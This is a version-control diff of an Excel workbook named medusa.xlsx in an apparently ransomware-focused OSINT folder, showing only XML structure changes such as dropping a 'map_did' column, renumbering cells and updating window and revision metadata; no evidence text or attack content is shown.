--- a/delta2/lib_e/osi_ransom/medusa.xlsx
+++ b/delta2/lib_e/osi_ransom/medusa.xlsx
@@ -5,12 +5,12 @@
   <workbookPr defaultThemeVersion="202300"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osint_ransom/"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3FBABB6C-5A1E-8548-8996-A0DF9BAD2913}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2D61E427-E56A-AC4A-B5A4-41975D137E4B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="900" yWindow="-20840" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -592,16 +592,16 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G71" totalsRowShown="0" dataDxfId="0">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G71" totalsRowShown="0" dataDxfId="7">
   <autoFilter ref="A1:G71" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
   <tableColumns count="7">
-    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="7"/>
-    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="6"/>
-    <tableColumn id="3" xr3:uid="{F8B6E0DD-D4FA-1C43-B56F-C68835F236FD}" name="map_did" dataDxfId="5"/>
-    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="4"/>
-    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="3"/>
-    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="2"/>
-    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="1"/>
+    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
+    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
+    <tableColumn id="3" xr3:uid="{F8B6E0DD-D4FA-1C43-B56F-C68835F236FD}" name="map_did" dataDxfId="4"/>
+    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
+    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
+    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
+    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="0"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -926,8 +926,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:G71"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="A2" sqref="A2:A71"/>
+    <sheetView tabSelected="1" topLeftCell="A2" workbookViewId="0">
+      <selection activeCell="G21" sqref="G21"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>

--- a/delta2/lib_e/osi_ransom/medusa.xlsx
+++ b/delta2/lib_e/osi_ransom/medusa.xlsx
@@ -1,16 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10402"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10413"/>
   <workbookPr defaultThemeVersion="202300"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2D61E427-E56A-AC4A-B5A4-41975D137E4B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{39D1AE5C-38EF-9B48-AD72-E43F3588CBE7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="900" yWindow="-20840" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="100" yWindow="-21100" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="287" uniqueCount="151">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="286" uniqueCount="150">
   <si>
     <t>eid</t>
   </si>
@@ -45,9 +45,6 @@
   </si>
   <si>
     <t>description</t>
-  </si>
-  <si>
-    <t>map_did</t>
   </si>
   <si>
     <t>evidence</t>
@@ -553,10 +550,7 @@
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="8">
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
+  <dxfs count="7">
     <dxf>
       <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
@@ -592,16 +586,15 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G71" totalsRowShown="0" dataDxfId="7">
-  <autoFilter ref="A1:G71" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <tableColumns count="7">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F71" totalsRowShown="0" dataDxfId="0">
+  <autoFilter ref="A1:F71" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+  <tableColumns count="6">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
-    <tableColumn id="3" xr3:uid="{F8B6E0DD-D4FA-1C43-B56F-C68835F236FD}" name="map_did" dataDxfId="4"/>
-    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
-    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
-    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
-    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="0"/>
+    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="4"/>
+    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="3"/>
+    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="2"/>
+    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta" dataDxfId="1"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -924,23 +917,23 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G71"/>
+  <dimension ref="A1:F71"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A2" workbookViewId="0">
-      <selection activeCell="G21" sqref="G21"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="D6" sqref="D6"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="15.1640625" customWidth="1"/>
     <col min="2" max="3" width="21.5" customWidth="1"/>
-    <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
-    <col min="5" max="5" width="143.33203125" customWidth="1"/>
-    <col min="6" max="6" width="61" customWidth="1"/>
+    <col min="4" max="4" width="133.83203125" customWidth="1"/>
+    <col min="5" max="5" width="49.83203125" customWidth="1"/>
+    <col min="6" max="6" width="104.33203125" customWidth="1"/>
     <col min="7" max="7" width="147.1640625" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:7" x14ac:dyDescent="0.2">
+    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
       <c r="A1" t="s">
         <v>0</v>
       </c>
@@ -948,1209 +941,1136 @@
         <v>1</v>
       </c>
       <c r="C1" t="s">
+        <v>5</v>
+      </c>
+      <c r="D1" t="s">
         <v>3</v>
       </c>
-      <c r="D1" t="s">
-        <v>6</v>
-      </c>
       <c r="E1" t="s">
+        <v>2</v>
+      </c>
+      <c r="F1" t="s">
         <v>4</v>
       </c>
-      <c r="F1" t="s">
-        <v>2</v>
-      </c>
-      <c r="G1" t="s">
-        <v>5</v>
-      </c>
-    </row>
-    <row r="2" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+    </row>
+    <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
       <c r="A2" s="1" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="B2" s="1"/>
-      <c r="C2" s="1"/>
+      <c r="C2" s="1" t="s">
+        <v>6</v>
+      </c>
       <c r="D2" s="1" t="s">
         <v>7</v>
       </c>
-      <c r="E2" s="1" t="s">
-        <v>8</v>
-      </c>
-      <c r="F2" s="1"/>
-      <c r="G2" s="1" t="s">
+      <c r="E2" s="1"/>
+      <c r="F2" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="3" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A3" s="1" t="s">
+        <v>81</v>
+      </c>
+      <c r="B3" s="1"/>
+      <c r="C3" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D3" s="1" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="3" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A3" s="1" t="s">
+      <c r="E3" s="1"/>
+      <c r="F3" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A4" s="1" t="s">
         <v>82</v>
       </c>
-      <c r="B3" s="1"/>
-      <c r="C3" s="1"/>
-      <c r="D3" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E3" s="1" t="s">
+      <c r="B4" s="1"/>
+      <c r="C4" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D4" s="1" t="s">
         <v>10</v>
       </c>
-      <c r="F3" s="1"/>
-      <c r="G3" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="4" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A4" s="1" t="s">
+      <c r="E4" s="1"/>
+      <c r="F4" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="5" spans="1:6" ht="119" x14ac:dyDescent="0.2">
+      <c r="A5" s="1" t="s">
         <v>83</v>
       </c>
-      <c r="B4" s="1"/>
-      <c r="C4" s="1"/>
-      <c r="D4" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E4" s="1" t="s">
+      <c r="B5" s="1"/>
+      <c r="C5" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D5" s="1" t="s">
         <v>11</v>
       </c>
-      <c r="F4" s="1"/>
-      <c r="G4" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="5" spans="1:7" ht="119" x14ac:dyDescent="0.2">
-      <c r="A5" s="1" t="s">
+      <c r="E5" s="1"/>
+      <c r="F5" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A6" s="1" t="s">
         <v>84</v>
       </c>
-      <c r="B5" s="1"/>
-      <c r="C5" s="1"/>
-      <c r="D5" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E5" s="1" t="s">
+      <c r="B6" s="1"/>
+      <c r="C6" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D6" s="1" t="s">
         <v>12</v>
       </c>
-      <c r="F5" s="1"/>
-      <c r="G5" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="6" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A6" s="1" t="s">
+      <c r="E6" s="1"/>
+      <c r="F6" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A7" s="1" t="s">
         <v>85</v>
       </c>
-      <c r="B6" s="1"/>
-      <c r="C6" s="1"/>
-      <c r="D6" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E6" s="1" t="s">
+      <c r="B7" s="1"/>
+      <c r="C7" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D7" s="1" t="s">
         <v>13</v>
       </c>
-      <c r="F6" s="1"/>
-      <c r="G6" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="7" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A7" s="1" t="s">
+      <c r="E7" s="1"/>
+      <c r="F7" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A8" s="1" t="s">
         <v>86</v>
       </c>
-      <c r="B7" s="1"/>
-      <c r="C7" s="1"/>
-      <c r="D7" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E7" s="1" t="s">
+      <c r="B8" s="1"/>
+      <c r="C8" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D8" s="1" t="s">
         <v>14</v>
       </c>
-      <c r="F7" s="1"/>
-      <c r="G7" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="8" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A8" s="1" t="s">
+      <c r="E8" s="1"/>
+      <c r="F8" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A9" s="1" t="s">
         <v>87</v>
       </c>
-      <c r="B8" s="1"/>
-      <c r="C8" s="1"/>
-      <c r="D8" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E8" s="1" t="s">
+      <c r="B9" s="1"/>
+      <c r="C9" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D9" s="1" t="s">
         <v>15</v>
       </c>
-      <c r="F8" s="1"/>
-      <c r="G8" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="9" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A9" s="1" t="s">
+      <c r="E9" s="1"/>
+      <c r="F9" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A10" s="1" t="s">
         <v>88</v>
       </c>
-      <c r="B9" s="1"/>
-      <c r="C9" s="1"/>
-      <c r="D9" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E9" s="1" t="s">
+      <c r="B10" s="1"/>
+      <c r="C10" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D10" s="1" t="s">
         <v>16</v>
       </c>
-      <c r="F9" s="1"/>
-      <c r="G9" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="10" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A10" s="1" t="s">
+      <c r="E10" s="1"/>
+      <c r="F10" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A11" s="1" t="s">
         <v>89</v>
       </c>
-      <c r="B10" s="1"/>
-      <c r="C10" s="1"/>
-      <c r="D10" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E10" s="1" t="s">
+      <c r="B11" s="1"/>
+      <c r="C11" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D11" s="1" t="s">
         <v>17</v>
       </c>
-      <c r="F10" s="1"/>
-      <c r="G10" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="11" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A11" s="1" t="s">
+      <c r="E11" s="1"/>
+      <c r="F11" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A12" s="1" t="s">
         <v>90</v>
       </c>
-      <c r="B11" s="1"/>
-      <c r="C11" s="1"/>
-      <c r="D11" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E11" s="1" t="s">
+      <c r="B12" s="1"/>
+      <c r="C12" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D12" s="1" t="s">
         <v>18</v>
       </c>
-      <c r="F11" s="1"/>
-      <c r="G11" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="12" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A12" s="1" t="s">
+      <c r="E12" s="1"/>
+      <c r="F12" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A13" s="1" t="s">
         <v>91</v>
       </c>
-      <c r="B12" s="1"/>
-      <c r="C12" s="1"/>
-      <c r="D12" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E12" s="1" t="s">
+      <c r="B13" s="1"/>
+      <c r="C13" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D13" s="1" t="s">
         <v>19</v>
       </c>
-      <c r="F12" s="1"/>
-      <c r="G12" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="13" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A13" s="1" t="s">
+      <c r="E13" s="1"/>
+      <c r="F13" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A14" s="1" t="s">
         <v>92</v>
       </c>
-      <c r="B13" s="1"/>
-      <c r="C13" s="1"/>
-      <c r="D13" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E13" s="1" t="s">
+      <c r="B14" s="1"/>
+      <c r="C14" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D14" s="1" t="s">
         <v>20</v>
       </c>
-      <c r="F13" s="1"/>
-      <c r="G13" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="14" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A14" s="1" t="s">
+      <c r="E14" s="1"/>
+      <c r="F14" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A15" s="1" t="s">
         <v>93</v>
       </c>
-      <c r="B14" s="1"/>
-      <c r="C14" s="1"/>
-      <c r="D14" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E14" s="1" t="s">
+      <c r="B15" s="1"/>
+      <c r="C15" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D15" s="1" t="s">
         <v>21</v>
       </c>
-      <c r="F14" s="1"/>
-      <c r="G14" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="15" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A15" s="1" t="s">
+      <c r="E15" s="1"/>
+      <c r="F15" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="16" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A16" s="1" t="s">
         <v>94</v>
       </c>
-      <c r="B15" s="1"/>
-      <c r="C15" s="1"/>
-      <c r="D15" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E15" s="1" t="s">
+      <c r="B16" s="1"/>
+      <c r="C16" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D16" s="1" t="s">
         <v>22</v>
       </c>
-      <c r="F15" s="1"/>
-      <c r="G15" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="16" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A16" s="1" t="s">
+      <c r="E16" s="1"/>
+      <c r="F16" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="17" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A17" s="1" t="s">
         <v>95</v>
       </c>
-      <c r="B16" s="1"/>
-      <c r="C16" s="1"/>
-      <c r="D16" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E16" s="1" t="s">
+      <c r="B17" s="1"/>
+      <c r="C17" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D17" s="1" t="s">
         <v>23</v>
       </c>
-      <c r="F16" s="1"/>
-      <c r="G16" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="17" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A17" s="1" t="s">
+      <c r="E17" s="1"/>
+      <c r="F17" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A18" s="1" t="s">
         <v>96</v>
       </c>
-      <c r="B17" s="1"/>
-      <c r="C17" s="1"/>
-      <c r="D17" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E17" s="1" t="s">
+      <c r="B18" s="1"/>
+      <c r="C18" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D18" s="1" t="s">
         <v>24</v>
       </c>
-      <c r="F17" s="1"/>
-      <c r="G17" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="18" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A18" s="1" t="s">
+      <c r="E18" s="1"/>
+      <c r="F18" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="19" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A19" s="1" t="s">
         <v>97</v>
       </c>
-      <c r="B18" s="1"/>
-      <c r="C18" s="1"/>
-      <c r="D18" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E18" s="1" t="s">
+      <c r="B19" s="1"/>
+      <c r="C19" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D19" s="1" t="s">
         <v>25</v>
       </c>
-      <c r="F18" s="1"/>
-      <c r="G18" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="19" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A19" s="1" t="s">
+      <c r="E19" s="1"/>
+      <c r="F19" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="A20" s="1" t="s">
         <v>98</v>
       </c>
-      <c r="B19" s="1"/>
-      <c r="C19" s="1"/>
-      <c r="D19" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E19" s="1" t="s">
+      <c r="B20" s="1"/>
+      <c r="C20" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D20" s="1" t="s">
         <v>26</v>
       </c>
-      <c r="F19" s="1"/>
-      <c r="G19" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="20" spans="1:7" ht="17" x14ac:dyDescent="0.2">
-      <c r="A20" s="1" t="s">
+      <c r="E20" s="1"/>
+      <c r="F20" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="21" spans="1:6" ht="119" x14ac:dyDescent="0.2">
+      <c r="A21" s="1" t="s">
         <v>99</v>
       </c>
-      <c r="B20" s="1"/>
